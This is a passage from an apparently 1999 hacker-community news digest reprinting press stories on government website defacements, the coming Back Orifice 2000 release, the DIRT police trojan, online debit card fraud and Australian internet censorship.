The task force's efforts culminated this year with a raid on a factory in the southern California city where officers found $2.5 million in manufacturing equipment and more than $40 million worth of counterfeit Microsoft Windows, Office, and other programs. A total of 11 people have been arrested or indicted in connection with the raid, Frank said. Microsoft's donations will go toward technology access and education projects around the world, Smith said. Copyright© 1999 Reuters Limited. @HWA 22.0 Biometrics comes to Home Shopping ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN http://www.hackernews.com/ contributed by RickDogg The Home Shopping Network will introduce biometric security to a large variety of consumers when it launches its voice-print technology next month. This new technology will enable HSN to automatically identify customers by their voice. This will allow repeat customers to order products faster and will allow HSN to create a very accurate customer database. Wired http://www.wired.com/news/news/technology/story/20460.html Giving Voice to Net Security by Leander Kahney 3:00 a.m. 29.Jun.99.PDT The Home Shopping Network next month will be able to automatically identify customers on the phone by their voices. In the first large-scale deployment of its kind, HSN's speech-print service will allow frequent shoppers to dispense with passwords and personal identification numbers, the company said. See also: Biometric Banking Bides Time Voice recognition is just the first step: HSN said it hopes to completely automate the ordering process by the end of the year. Based on technology from Nuance Communications, the voiceprint system will ask callers for their phone numbers. Callers will then be passed on to human order-takers to complete the purchase. "[Voice-recognition systems] are a lot more convenient for the customer and can save the company a lot of money," said Steve Ehrlich, Nuance's vice president of marketing. Automated phone-ordering systems can cost 90 percent less than conventional, human-operated systems, according to Ehrlich, who said Charles Schwab will roll out a similar system later this year. He said the technology handles a number of languages and copes well with regional accents and things like bad phone lines and stuffy noses. In addition to convenience, the technology will help HSN build a detailed database of its customers, said Bill Meisel, editor and publisher of the Speech Recognition Update, a monthly newsletter. Currently, a household is issued a single verification number by HSN. The voiceprint technology will allow the company to identify and collect data on individual members in a household, Meisel said. "These are the kind of subtle advantages that make fraud prevention almost a secondary consideration," he said. However, Meisel said the voiceprint system will be more secure than using a verification number. To crack the system would require a wiretap to obtain an accurate recording of someone's voice, Meisel said. It should not be possible to simply use a tape recorder. "The process of taping a voice changes its acoustic characteristics," he said. "It wouldn't work with a tape recorder ... practically speaking, it's very difficult [to crack the system]." Meisel said similar voice-recognition systems are in use in prisons, where calling rights are a form of prison commerce. @HWA 23.0 Palm VII Revealed ~~~~~~~~~~~~~~~~~ June 29th From HNN http://www.hackernews.com/ contributed by Kingpin Too poor to buy a Palm VII? Don't want to risk your new toy? Well one brave soul has taken apart his Palm VII, taken pictures, and posted them to the web. A nice treat for you hardware guys. The Gadgeteer http://www.the-gadgeteer.com/palmvii-guts.html @HWA 24.0 Who Is HNN? ~~~~~~~~~~~ June 29th From HNN http://www.hackernews.com/ contributed by Space Rogue A lot of people have asked just who is it that runs HNN and keeps the place together. We have created a page to answer just that question. The page even has pictures and everything. Who Is HNN? http://www.hackernews.com/misc/whorwe.html HNN will be packing up shop and heading for Las Vegas sometime around Wednesday next week. We will do what we can to update the site remotely but the updates may be periodic at best. Besides who is going to be around to read HNN if everyone is at Defcon? @HWA 25.0 AntiOnline on the trail of f0rpaxe ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From www.antionline.com AntiOnline Tracks F0rpaxe Tuesday, June 29, 1999 at 14:00:15 by John Vranesevich - Founder of AntiOnline AntiOnline investigations into the recent wave of attacks being done by a group known as 'F0rpaxe' has led to the discovery of the true-life-identity of the group's leader, aka m1crochip. F0rpaxe is known to have broken into over 130 servers in the past two months, belonging to dozens of different organizations, including: NASA Goddard Space Flight Center US Navy US Coast Guard US Department of Agriculture US Department of the Interior University of Wisconsin Harvard University University of Colorado Georgetown University University of Michigan UC Davis F0rpaxe officially 'Declared War' against the US government after the FBI raided several malicious hackers, including individuals known to be members of the 'gH' hacking group, which is believed to be responsible for attacks against the White House's Website. F0rpaxe released a statement earlier this month which read in part: We think that FBI should explain what a fuck they are doing. For the moment we wont destroy the servers we hack but if it is necessary we can burn alot of servers. M1crochip, along with several other F0rpaxe members, have been featured in several publications, including MSNBC and Wired News. F0rpaxe's latest attack took place yesterday, against servers at UCLA. AntiOnline was able to gain the name and phone number of m1crochip, who lives in the city of Perafita, Portugal, shortly after a request for information came in. Note: AntiOnline will not release information on this individual to the general public. @HWA 26.0 Critical NOAA Web Site Attacked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN http://www.hackernews.com/ contributed by Mortel The Storm Prediction Center, an arm of the National Oceanic and Atmospheric Agency (NOAA) was defaced yesterday. While the site was primarily used to distribute severe weather warnings, that information was available from other sources such as the National Weather Service. Unfortunately NOAA chose to run critical services such as email on the same machine so when they took down the server to correct the defacement their email was also off line creating severe disruptions in office work flow. HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html Fox News http://www.foxnews.com/js_index.sml?content=/scitech/wires2/0629/t_rt_0629_40.sml MSNBC http://www.msnbc.com/news/284765.asp Computer World http://www.computerworld.com/home/news.nsf/all/9906292noaahac Andover News http://www.andovernews.com/cgi-bin/news_story.pl?3570/topstories Correction: 1615EST We have been informed that the email server was not on the same machine as the web server but was taken offline as a precautionary measure until the extent of the attack could be determined. Fox; Hackers Hit Storm Prediction Web Site 8:16 p.m. ET (017 GMT) June 29, 1999 NORMAN, Okla. — Computer hackers vandalized the Web page of the top U.S. weather agency's storm prediction center Tuesday in the latest of a rash of attacks on government Internet sites, officials said. The attack blocked the Internet weather warnings of the Storm Prediction Center, an arm of the National Oceanic and Atmospheric Agency (NOAA), at a time of year when powerful thunderstorms and tornadoes can break out across the Plains states. "If there were severe weather already happening at that time of morning, it could have been a problem for a lot of people,'' Dr Joseph Schaeffer, director of the Storm Prediction Center, told Reuters. Hackers calling themselves the "Keebler Elves'' deleted the Storm Prediction Center homepage (www.spc.noaa.gov) and replaced it with their own page declaring "Learn to fear the elite''. Schaeffer said the same storm forecasts were available elsewhere, including from the National Weather Service. But he said the blockage was an inconvenience to emergency management officials, who are used to quick and easy Internet access to the center's updated weather maps and other data. The attack was discovered at 3:00 a.m. EDT (0700 GMT) by someone trying to find weather data and reported quickly, so storm center technical staffers shut down the Web page. Repairing the damage and tracing and recording the hacker's steps for potential future criminal prosecution would keep the Web site down until late Tuesday, officials said. The damage also shut down the Web page of NOAA's Severe Storm Laboratory (www.ssl.noaa.gov), which is next door to the storm prediction center in Norman, Oklahoma. The Internet pages for both centers are run from the same computer, which was invaded by the hackers. The U.S. Army earlier Tuesday said it had launched a criminal investigation into an electronic break-in of its main Internet site, but stressed that hackers did not breach military security or operations. A hacker group also broke into four U.S. Department of Agriculture Web sites over the weekend, the USDA said. Military and other government officials have voiced major concern over repeated break-ins in the past year by electronic wizards anxious to simply show their hacking ability or to actually steal secrets. In March, a Pentagon-sponsored study ordered by Congress in 1995 concluded that military computer and communications systems were increasingly vulnerable to attack by hackers and high-tech enemies. -=- Computer World; Weather Web site hit by intruders By Kathleen Ohlson The National Oceanic and Atmospheric Administration's (NOAA) Storm Prediction Center became the latest Web target of hackers when one or more intruders broke into the site. Both the site and e-mail for the Storm Prediction Center, based in Norman, Okla., were taken down as soon as the infiltration was detected, said Tim Tomastik, the NOAA's deputy director of public affairs in Washington. Tomastik said the attack on the federal weather service forced its clients and customers to go to other sites for weather data. "It's weather data," he said. "There's no national security involved. I have no idea why they would go after it." Officials are still trying to determine what, if any, damage was done to the site by the intrusion. So far, they know that some "real minor goofing with the text occurred," but nothing major, Tomastik said. Yesterday, the U.S. Army Web site was breached (see story) and the home page defaced. Tomastik said the NOAA is evaluating its system and expects federal authorities to look into what happened. The site is expected to be back up later today. @HWA 27.0 Back Orifice 2000 is on its Way ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN http://www.hackernews.com/ contributed by RickDogg Set to be released on July 10th at Defcon, Back Orifice 2000 is already making news. The new version of Back Orifice will run on NT, be much harder to detect and have a very robust plugin architecture. Wired http://www.wired.com/news/news/technology/story/20493.html Back Orifice 2000 http://www.bo2k.com Wired; Coming Soon: Back Orifice 2000 by Niall McKay 3:00 a.m. 30.Jun.99.PDT An underground computer security group is poised to release a new version of a notorious software program that could allow crackers to watch and listen in on Windows-based PC users. The Cult of the Dead Cow said it will release Back Orifice 2000 on 9 July -- at the annual Def Con convention in Las Vegas. "This will demonstrate that Microsoft's operating systems are completely insecure and a bad choice for consumers and businesses who demand privacy," said Oxblood Ruffian, a former United Nations consultant and current Cult of the Dead Cow spokesman. See also: Back Orifice a Pain in the ...? http://redirect.wired.com/redir/10025/http://www.wired.com/news/news/technology/story/14092.html Def Con is perhaps the most unusual gathering in the computer security field. Hackers, crackers, and self-proclaimed security experts will mingle with media, security professionals, federal law enforcement officers, and "script kiddies" who deface Web pages with prefab cracking code. Security groups of all stripes use the occasion to release software and show off gadgets. But Back Orifice 2000 is perhaps the most anticipated item. Unlike previous versions of the software, Back Orifice 2000 will run on Windows NT and feature strong encryption and a modular architecture that the group said will allow hackers and other security groups to write plug-ins. The program will be released as open source to encourage further development by the security community. Back Orifice, released at last year's Def Con, may allow malicious users to monitor and tamper with computers without the permission or knowledge of their owners. The program is classified as a Trojan Horse because crackers need to dupe the user into installing an application on their hard disk. Despite this, Oxblood Ruffian said that the program is currently installed on up to a half-million PCs worldwide. Though that number could not be independently verified, an Australian computer security group last November said that 1,400 Australian Internet accounts have been compromised by Back Orifice. Back Orifice 2000 also promises to be a great deal more difficult to detect than its predecessor because it enables users to configure its port setting. Previously, intrusion detection and antivirus programs could detect Back Orifice because it used a default port setting of 3113. (Er that should read 31337 -Ed) A Microsoft Windows NT Server security manager said the company is closely monitoring Back Orifice development and is working with antivirus and intrusion detection software vendors to provide customers with utilities to combat the software. "Trojan Horses are not technological issues but a social engineering problem because they rely on the ability of the cracker to trick the user into running an application," said Scott Culp. "It's just a fact of computer science that if you run a piece of code on your machine you run the risk making your system vulnerable." The solution, according to Culp, is to ensure that users do not install any software from untrusted sources and regularly update antivirus and intrusion detection programs. Also at the show, independent security consulting firm L0pht Heavy Industries will release Anti-Sniffer, a network monitoring tool, and will announce B00te Call, a PalmPilot War Dialer. Such programs will automatically dial telephone numbers in sequence, looking for modems. Zero-Knowledge Systems is also expected to provide further details about Freedom, a network of servers promising total online anonymity. Def Con will also feature some of its legendary sideshow attractions, such as the Spot the Fed contest. In this game, conference attendees are invited to point out suspicious attendees who may be working for federal law enforcement agencies. Winners will be awarded an "I spotted the Fed" T-shirt. Other diversions include a fancy dress ball, Hacker Jeopardy, and the Hacker Death Match, a game that enables hackers to take their flame mails out of cyberspace and into reality by dressing up in giant inflatable Sumo suits to do battle. Well-heeled attendees are invited to a US$100 outing to Cirque du Soleil. Meanwhile, the conference will include sessions on how to detect wiretaps; the art and science of enemy profiling; hacking ethics, morality, and patriotism; cyber-forensic analysis; and a talk on the practice of hiring hackers as security consultants. @HWA 28.0 Support for Web Security Spec Announced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN http://www.hackernews.com/ contributed by RickDogg Microsoft and HP have announced their support for the HTTP/1.1 Message Digest Authentication specification. This new specification published by the Internet Engineering Task Force last month proposes the use of MD5 instead of SSL for password traffic. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,408287,00.html @HWA 29.0 Pentagon Investigates Computer Security Breech ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN http://www.hackernews.com/ contributed by RickDogg An employee of the Defense Threat Reduction Agency is under investigation by the Air Force Office of Special Investigations for allegedly seeking unauthorized access to the computer system of a coworker. Evidently the employee requested access to a senior official's computer while the official was away. The request was denied and no access was gained. San Jose Mercury News http://www.sjmercury.com/breaking/docs/020735.htm Posted at 9:22 a.m. PDT Tuesday, June 29, 1999 Defense employee faces probe over computer incident WASHINGTON (AP) -- The Pentagon said today it is investigating an attempted computer security breach last week at a defense agency responsible for reviewing sensitive technology exports. An unidentified employee of the Defense Threat Reduction Agency is under investigation for allegedly seeking unauthorized access to the computer system of a coworker, agency spokesman Clem Gaines said. Gaines said the employee under investigation by the Air Force Office of Special Investigations had requested access to the government computer used by Peter Leitner, a senior advisor to the defense agency on matters involving exports of sensitive technologies. Gaines declined to identify the individual. The individual's request for use of Leitner's computer was denied and there was no security breach, Gaines said. The unauthorized request for access to Leitner's computer was made June 24, while Leitner was on Capitol Hill testifying before the House Committee on Government Reform, Gaines said. Leitner has rankled some in the Pentagon by charging that senior defense officials have glossed over concerns in the lower ranks that U.S. businesses were allowed to sell China and other countries technology with military applications. Gaines, the agency spokesman, said he could not discuss any details of the computer security investigation, which was requested Monday by the agency's director, Jay Davis. Pending the outcome of the investigation, the individual has been temporarily assigned to other duties, which Gaines did not specify. @HWA 30.0 What will the Next Generation of Viruses Bring? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN http://www.hackernews.com/ contributed by Deepquest Melissa and WormExplorer were devastating to business and governments world wide. As viruses get more sophisticated and virus writers get more creative what sort of viruses can the world expect to see in the next six months or a year? BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_381000/381054.stm Sci/Tech New virus spills your beans Virus threatens document security A new strain of computer virus could distribute your highly confidential documents all over the Internet. Anti-virus developers are warning that they cannot develop an antidote until the virus appears. Far from destroying vital files, the virus will make sure everyone can see them. The new virus is expected to be a variant of either Melissa or the Explore.Zip worm, both of which have cost businesses millions in recent weeks. Both Melissa and the Explore.Zip worm rely on people opening email attachments. Once into the computer the virus sends a message to everyone in the victim's in-box and then destroys every file written in Microsoft Word, Excel or Powerpoint, among others. New virus on the block One variant has already appeared. PrettyPark replicates itself by sending copies to everyone in the victim's address book. It waits silently until the victim is on the Internet, then sends lists of the victim's user names, password files and address lists to Internet Relay Chat channels. Anti-virus developers are expecting the next step to be a virus which roots around in your files and then posts your documents across the Internet. "The virus wouldn't be able to tell which of your documents are secret. It might just post your shopping list, or it could be a highly sensitive company document. "What's more, it would appear as if you sent it," says Graham Cluley of Sophos Anti-Virus. Several anti-virus makers already have an answer to PrettyPark. But they cannot build a defence against future variants until they encounter them. Java and ActiveX - next infection target It is predicted that the next generation of viral infections will hit small Webpage programmes called applets, written in Java and ActiveX. A recent survey revealed that more than half of medium-sized organisations using an intranet had no security policy in place to respond to the threat of attacks on Java applets. Recent estimates indicate that Melissa, Explore.Zip and other malicious attacks have cost US business $7.6bn this year alone. The viruses cannot infect Macintosh or Unix systems. @HWA 31.0 DIRT still Around, Used by LAw Enforcement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN http://www.hackernews.com/ contributed by wannabe We have all heard of BO (Back Orifice) or NetBus but what about DIRT? DIRT stands for Data Interception by Remote Transmission and is a commercial software package only available to law enforcement officials. DIRT, like BO and NetBus, allows remote control of a PC with or without the user's knowledge. Unfortunately this article makes no mention of whether it is necessary for law enforcement to get a search warrant before they use such a tool. PC World http://www.pcworld.com/pcwtoday/article/0,1510,11614,00.html Correction 1615EST Evidently the above story does mention that a search warrant is needed before law enforcement can use this tool. Unfortunately we missed that information. The story does mention that Frank Jones think that the Cult of the Dead Cow stole the idea for Back Orifice after seeing a DIRT demo. We have recieved staunch denials of this accusation from several members of cDc. PC World; Getting DIRT on the Bad Guys Here's the ultimate weapon in the war against cyber crime. by Tom Spring, PC World June 29, 1999, 12:23 p.m. PT To former detective Frank Jones, "secure network" is an oxymoron. The word "delete" isn't in his vocabulary. Password-protect your computer and you'll make his day. And if you really get on Jones' bad side, he'll take complete control of your PC--and your first clue will be when you open your door and the boys in overcoats start flashing badges at you. If you're among the anonymous thousands of cyber bad guys who inhabit the Internet's underbelly, Jones is your worst nightmare. The retired New York City detective works on the law enforcement sidelines building software tools to help the government and police crack down on online criminals. And his latest tool is considered the ultimate weapon. Digging up DIRT Jones wrote the widely used, but little-known software program called DIRT. The program works like a telephone wiretap for computers, giving its users the ability to monitor and intercept data from any Windows PC in the world. DIRT stands for Data Interception by Remote Transmission and was originally created by Jones as a tool to help snare online child pornographers. But in the short time it has been available only to government and law enforcement agencies, DIRT is now used to battle hacker groups like Cult of the Dead Cow and to trap terrorists, drug dealers, money launderers, and spies. "What we do is give law enforcement an additional line of defense," says Jones, the president of Codex Data Systems. The DIRTy Details The client side version of the DIRT program is less than 20KB in size and is typically installed on a target PC using a Trojan horse program (a set of instructions hidden inside a legitimate program). The DIRT program is usually sneaked inside an e-mail attachment, a macro, or a workable program that a targeted user is enticed to download. Once inside a target Windows 95/98/NT computer, it gives law enforcement complete control of the system without the user's knowledge. It starts off by secretly recording every keystroke the user makes. The next time the user goes online, DIRT transmits the log for analysis. Jones says government agencies have even managed to open encrypted files by obtaining password locks. During a recent program demonstration, Jones easily uploaded and downloaded files to a DIRT-infected computer connected to the Net by a dial-up modem. Jones could upload and download files to the PC without a hint of activity on the other end. Arresting Developments If you think this sounds like B-grade fiction, it isn't. During a recent meeting of high-ranking federal and state gumshoes, DIRT received glowing software reviews. Many cited long lists of arrests thanks to Codex. One police detective said DIRT has become a powerful tool in fighting crime online. It aids criminal investigations and results in about one arrest each month. Most of those arrested were suspected pedophiles, he said. The hardest part of using DIRT, say its users, is getting owners of targeted computers to download the Trojan horse programs. Typically law enforcement tries to entice a targeted individual to download a program or a compressed file that must be "un-zipped" which contains the DIRT bug inside. Because the program is not available to the public, DIRT is undetectable using virus scanning software, Jones said. "The only way to avoid DIRT is to ignore your e-mail," he says. Fighting Fire With Fire Jones says law enforcement desperately needs these tools to turn the tide in its battle against online crime. "Law enforcement is outgunned," he says. In an age where hacking horror stories have become front-page news, DIRT gives law enforcement an effective tool to even the score and catch the bad guy. On one recent occasion DIRT was used to track a suspected drug dealer as he zigzagged across the country from client to client selling methamphetamines. His big mistake, police say, was keeping a client list on his laptop and logging into the Net each night to stay in touch with business associates and friends. Using DIRT, police tracked his whereabouts each night and took notes on who his associates were. The alleged drug dealer was eventually arrested as he was surfing the Net in a San Jose, California motel room. A Form of Flattery? Though DIRT is restricted to military, government, and law enforcement agencies, the "Back Orifice" hacker tool offers some similar tricks. Jones maintains that its inventor, a member of the hacking group Cult of the Dead Cow, attended Codex's first public demonstration of DIRT more than a year ago and slapped together an "imitation" of DIRT based on what he saw. "Close, but no cigar," Jones says. But according to Mike Hudack, editor of Aviary-mag.com, an online magazine for hackers, there's more to Back Orifice than that. An updated version called "Back Orifice 2000" is expected to hit the Web in July. Big Brotherware? Hudack says the technological Cold War between white-hat hackers and black-hat hackers is just beginning--and law enforcement needs all the help it can get. But others view DIRT as a potential threat to privacy, raising serious legal and ethical questions as a means of gathering information. To use DIRT law enforcement agencies must first obtain a wiretap search warrant. But privacy groups maintain that this type of electronic surveillance goes far beyond wiretap warrants because DIRT allows authorities to invisibly snoop inside a targeted PC's entire hard drive --not just monitor electronic communications. "Throughout history law enforcement has had a long track record of overstepping its bounds when it comes to search warrants," says Shari Steele, director of legal services for Electronic Freedom Foundation, the privacy rights group. Unless appropriate checks and balances are in place, Steele says, DIRT can quickly go from being an effective crime-fighting tool to a privacy activist's worst nightmare. The American Civil Liberties Union takes a harder stance. "Clandestine searches like these are the worst kind," says Barry Steinhardt, associate director of the ACLU. "This is exactly the kind of search the Fourth Amendment is designed to protect us from." @HWA 32.0 Debit Cards Not Safe on the Internet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN http://www.hackernews.com/ contributed by mortel Illustrating the problem of debit card use on the Internet Don Garlock, a consultant for the Bedford County Sheriff's Department in Bedford, VA describes his search for the people who wiped out his bank account. MSNBC http://www.msnbc.com/news/283239.asp The dark side of online shopping Trail of fraud leads from Amazon.com to Thailand By Molly Masland MSNBC June 24 When Internet investigator Don Garlock’s bank account was mysteriously cleaned out in early June, the last thing he expected was that the search for the culprit would take him on a shadowy trail through cyberspace. The clues began at online retail giant Amazon.com and led to a ring of alleged hackers in Bangkok, Thailand. Along the way, Garlock picked up crucial lessons about the perils of online shopping, even at sites that claim to be "100 percent safe." A CONSULTANT for the Bedford County Sheriff’s Department in Bedford, Va., Garlock works for Operation Blue Ridge Thunder, a program aimed at stopping crimes against children on the Internet. Garlock has logged hundreds of hours hunting down pedophiles and child pornographers online. So when his personal bank account was suddenly emptied in early June, Garlock put his online tracking skills to the test. But even he was surprised by what he discovered. FRAUDULENT CHARGES AT AMAZON According to Mainstreet Bank Group, Garlock’s bank, someone had purchased nearly $1,400 worth of merchandise at Amazon.com and charged it to his debit card account. When the mysterious charges at Amazon.com appeared, Garlock immediately suspected fraud and called the online retailer of books and music to find out who was responsible. But Garlock was astonished to find that Amazon.com would not release any information to him about his account. A customer of several years, Garlock had placed modest orders in the past, spending a total of $160, and had never had an unpleasant shopping experience at the online retailer’s site. But Amazon.com would neither release the name of the individual who had purchased the goods using his debit card number nor tell Garlock what specific merchandise had been bought or where it had been shipped. Amazon.com spokesman Paul Capelli said the company makes it a policy to release detailed information about an account only to a customer’s bank, which can then release the details to their client. “We want to take reasonable steps to protect our customers’ privacy,” said Capelli. “We need to know we’re dealing with the real customer, not someone calling on the phone who could be anyone.” As a result, the only information Garlock received directly was a hint accidentally leaked over the phone by a customer service representative. “They let slip the first half of the e-mail address, and then they realized what they had done and put me on hold. They came back and read me a prepared response to the effect that they could not divulge any additional information to me,” said Garlock. TRAIL TO THAILAND Frustrated, Garlock was determined to proceed with his own investigation. While his bank began an official inquiry into the case with Amazon.com, Garlock went to work. Using the limited information he had obtained from Amazon.com, he uncovered a path of clues leading to a ring of alleged computer hackers in Bangkok, Thailand. The first part of the e-mail address given to him contained “an unusual word and turned out to be what is a very common first name in that part of the world,” he said. Garlock was able to uncover a wealth of personal information about the individuals who had used his card.With the help of ordinary search engines, he uncovered their home addresses, phone numbers and where they attended college. Garlock also found that in addition to having multiple e-mail addresses and Web sites touting their hacking skills, the alleged thieves held legitimate Web development jobs. “We know a tremendous amount of personal, professional and business-type information on these people now from our investigations here in little old Bedford County,” said Sheriff Michael Brown. Eventually Amazon.com released the shipping address and fraudulent e-mail address used by the credit card thieves to Garlock’s bank, but by then the information only confirmed the data he had already uncovered. Because the sheriff’s office has no jurisdiction in Thailand, the department turned the case over to Interpol, the international crime investigation agency that works with federal law enforcement agencies and national police forces. Garlock’s case is under review and, according to Brown, will most likely be turned over to the FBI, U.S. Customs or the Secret Service. MORE CASES OF FRAUD ‘From the time there has been credit cards, there has been credit card fraud. Bad things can happen any place and the Internet is no different.’ PAUL CAPELLI Amazon.com spokesman In an e-mail sent to Garlock, Amazon.com’s investigations department confirmed that the charges made to his debit card were indeed “the result of unauthorized use.” Mainstreet Bank Group said an investigations officer at Amazon.com admitted that the same group in Thailand had set up a number of other stolen credit card numbers for use at the retailer’s site. In a memo obtained by MSNBC, Shirley Schoefield, a bank investigations officer at Mainstreet Bank Group, said that “according to the investigations department at Amazon, approximately 20 cards have been set up for use to purchase merchandise to be sent to the following shipping address (in Thailand).” Citing customer privacy restrictions, Schoefield refused to comment on the case. Amazon.com’s Capelli also refused to comment on the case of the 20 fraudulent credit cards, but acknowledged that there have been instances of credit card misuse at the site. “From the time there has been credit cards, there has been credit card fraud. Bad things can happen any place, and the Internet is no different. Any retailer encounters this problem,” he said. However, he insisted that Amazon.com’s security system had never been compromised. Currently Amazon.com is advertising for positions in its fraud investigation department. Under the section “employment opportunities” on its Web site, Amazon.com is looking for a “fraud detection specialist” as well as a “fraud detection manager.” ‘DON’T USE A DEBIT CARD’ Garlock’s situation was made worse by the fact that his debit card number was stolen instead of a credit card. If his credit card had been used fraudulently, according to federal regulations, he could have easily stopped payment on the account and would have been held responsible for no more than $50. But since his debit card was stolen, he temporarily lost everything in his checking account. When a debit card is used, the money is automatically removed from the account when the order is processed. While the bank is still responsible for paying Garlock back, he must wait until the official investigation is complete, a process that can take weeks and sometimes months. “One of the biggest lessons I’ve learned from this is, for God’s sake, don’t use a debit card on the Internet,” said Garlock. Amazon.com has a policy of fully refunding unauthorized charges billed to a customer’s account and has agreed to pay back Garlock any amount billed to his account that is not covered by his bank. HACKER AND/OR THIEF? While it is clear that Garlock’s debit card number was stolen and used illegally, what remains unknown is whether the thieves first obtained the number by breaking into Amazon.com’s site, or whether the numbers were obtained from another source or even generated randomly. Amazon.com’s Capelli said that hackers have never broken into the company’s site or stolen information on individual accounts. “Our system of storing credit card information has not been compromised, nor has it ever been compromised in any way. Any claims to this effect are not true — absolutely not true,” said Capelli. According to Inspector Earl Wismer of the San Francisco Police Department, which handles many cases of Internet fraud, “It’s really difficult to pin down where exactly a credit card number was acquired. It is common for credit card numbers to be fraudulently used on the Web, but we’re not able to determine whether the numbers were obtained from the Web or from some other source.” In addition to stealing credit card numbers the old-fashioned way, such as acquiring the number from receipts, there are several sites on the Web where hackers, or anyone else who’s interested, can generate legitimate credit card numbers based on algorithms, or mathematical formulas, used by banks. The algorithms generate all the numbers used by a given bank, but the hacker must then systematically try out each number in an effort to find one that is in current use and still has an available credit limit. CROSS CHECKS NEEDED Garlock’s case is worrisome because no matter how his debit card number was acquired, the user was still able to charge a hefty amount of merchandise to a debit card account owned by a person living in the Blue Ridge Mountains of Virginia and have it shipped to an address in Bangkok without any alarm bells going off at Amazon.com. “Apparently their order confirmation system that would match a card number to a given individual is seriously flawed,” said Garlock. According to Capelli, the person who fraudulently used Garlock’s debit card set up a separate account using the card number, but did not break into Garlock’s existing account. Capelli dismissed the need for a more thorough cross check of credit card numbers with existing account information adding that “it is very common to have more than one account per card number. For instance, there are husbands and wives with different names who have different accounts but use the same card number. Or parents who let their children use their credit card number to set up an account.” As Scambusters, an online consumer advocacy organization, points out, the reality is that it’s actually much safer to enter a credit card number on a secure online order form than it is to give a credit card to a waiter at a restaurant. But there are important security measures to be worked out before the process is 100 percent safe, despite what many online sites want customers to believe. "There is definitely a problem and I think some people in the industry have known that it is a problem. It is not one that’s going to be fixed easily,” said Sheriff Brown. “Consumers have just got to be careful.” @HWA 33.0 New Definition of 'Computer Hacker' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th From HNN http://www.hackernews.com/ contributed by mortel A woman in Grafton Ohio has redefined the term 'computer hacker'. Twenty nine year old Kelli Michetti, upset that her husband was spending too much time online took a meat cleaver and attacked the home computer. She was fined $200 for her actions. CBS News http://www.cbs.com/flat/story_164947.html @HWA 34.0 Hackers In the Workplace ~~~~~~~~~~~~~~~~~~~~~~~~ July 1st From HNN http://www.hackernews.com/ contributed by Whoever Security companies claim that they do not hire hackers. In reality are they actually actively recuiting hackers? Are they doing this because they know that not only are they the most knowledgeable but also the most loyal and hard working? A new HNN exclusive Buffer Overflow article examines these questions and more. Buffer Overflow http://www.hackernews.com/orig/buffero.html @HWA 35.0 NPR Covers .gov/.mil Defacements. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ July 2nd From HNN http://www.hackernews.com/ contributed by oolong In a rare moment of media impartiality, NPR's Morning Edition yesterday broadcast an article about the latest .gov breaking that featured an interview with Attrition staff. This interview properly puts the blame of the hacked pages on poor web server maintenance. This article is in Real Audio format. Kudos to Morning Edition for being fairly impartial, hopefully it will not be too much to ask other outlets to follow their example. NPR - print http://www.npr.org/news/tech NPR - Real Audio http://www.npr.org/ramfiles/me/19990630.me.03.ram " Hackers Strike Again Over the past month, there has been a rash of computer hacker attacks on government web sites including the White House, the FBI, and the Senate.Earlier this week they hit the Army's site and Wednesday the National Oceanic and Atmospheric Administration's Storm Prediction Center Web site was disabled. In some cases, the hackers were able to exploit computer systems that have not kept up to date with Internet security alerts. Hear more as NPR's John McChesney reports for Morning Edition. " 36.0 Australia Passes Major Net Censorship Law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ July 2nd From HNN http://www.hackernews.com/ contributed by photon Australian Parliament has created one of the world's most far-reaching online censorship laws. The Broadcasting Services Amendment Act will institute a rating system for Internet content. The Australian Broadcasting Authority will order ISPs to take down content on their servers rated X (Sexually Explicit) or RC (Refused Classification) within 24 hours of being notified. Opponents who failed to prevent the bills passing hope that the decentralized nature of the internet will prove to be uncontrollable by this new law. One loophole in the law is already being exploited, regulators forgot to include anonymous proxy services in the legislation. Wired http://www.wired.com/news/news/politics/story/20499.html MSNBC http://www.msnbc.com/news/285849.asp Broadcasting Services Amendment Act http://www.ozemail.com/~mbaker/amended.html Australian Broadcasting Authority http://www.aba.gov.au/ Wired; Australian Net Censor Law Passes by Stewart Taggart 8:15 a.m. 30.Jun.99.PDT CANBERRA, Australia -- The political leaders of this nation on Wednesday passed into law one of the world's most far-reaching online content censorship regimes. The rules -- which take effect 1 January, 2000 -- enable Australian government regulators to order domestic Internet service providers (ISPs) to take down indecent or offensive Web sites housed on their servers, and also require they block access to certain domestic or overseas-based content. "We're on fairly new ground here," said Stephen Nugent, special projects manager for the Australian Broadcasting Authority (ABA). "The codes of practice envisaged under this legislation are probably more detailed, and cover a greater range of matters, than I have seen in any other country." Known as the "Broadcasting Services Amendment (Online Services) Act", the measure was approved by the House of Representatives late Wednesday night, according to a staffer in the office of Communications Minister Richard Alston. The measure had passed the more contentious Australian Senate on 26 May. The new law will institute a movie-like rating system for Internet content. The ABA will order ISPs to take down content on their servers rated X (Sexually Explicit) or RC (Refused Classification) within 24 hours of being notified. For opponents of online content restrictions, the struggle will now shift to cyberspace itself. They believe the Internet simply will prove too large, too decentralized, and too fast-moving for regulators anywhere to successfully block access to any content for long. Among the defiant is Perth-based online entrepreneur Bernadette Taylor. Known to her Web site admirers as a "Virtual Girlfriend," she offers nude photos of herself and personalized email communication to paying members. To Taylor, passage of the law merely begins a hide-and-seek game she professes little doubt she'll win. With a Web site housed in Dallas, Texas, she plans to stay one step ahead of the nation's blocking mechanisms for as long as the law lasts. "With a bit of effort the ABA could find (and block) me every day but they'd have to spend five to 10 minutes doing it," she says. "In the meantime, I'm compiling a mail list which has all the people that want notification of where I am." She believes her 